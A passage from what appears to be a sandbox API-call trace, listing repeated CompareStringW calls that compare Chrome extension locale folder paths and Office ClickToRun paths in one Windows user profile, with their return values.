Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\", cchCount2=134) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\", cchCount2=134) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\", cchCount2=134) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\", cchCount2=134) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\", cchCount2=134) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\", cchCount2=130) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\", cchCount2=130) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount2=130) returned 3 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount2=130) returned 1 [0283.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount2=130) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount2=130) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount2=130) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\", cchCount2=130) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\", cchCount2=130) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\", cchCount2=130) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount2=132) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount2=132) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount2=132) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount2=132) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount2=132) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount2=132) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\", cchCount2=134) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\", cchCount2=134) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\", cchCount2=134) returned 1 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\", cchCount2=134) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\", cchCount2=134) returned 3 [0283.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0283.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount1=132, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0283.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0283.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\", cchCount1=103, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0283.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\", cchCount1=86, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0283.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 1 